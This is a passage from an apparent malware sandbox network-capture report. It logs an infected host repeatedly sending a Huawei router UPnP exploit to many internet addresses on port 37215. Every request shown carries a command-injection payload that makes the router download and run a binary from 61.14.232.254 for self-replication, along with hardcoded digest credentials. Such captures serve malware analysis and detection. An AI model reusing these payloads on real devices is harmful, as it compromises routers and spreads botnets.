69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  686192.168.2.1353122197.234.27.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369678974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  687192.168.2.1355342157.47.146.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369692087 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  688192.168.2.1358022197.103.252.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369714022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  689192.168.2.135145061.205.231.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369729996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  690192.168.2.1349182157.229.231.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369746923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  691192.168.2.133684641.160.8.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369797945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  692192.168.2.1356836157.106.193.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369812965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  693192.168.2.1360962204.238.5.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369837046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  694192.168.2.1334496197.106.167.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369851112 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  695192.168.2.135587860.243.163.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369878054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  696192.168.2.1357246197.185.247.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.369899035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
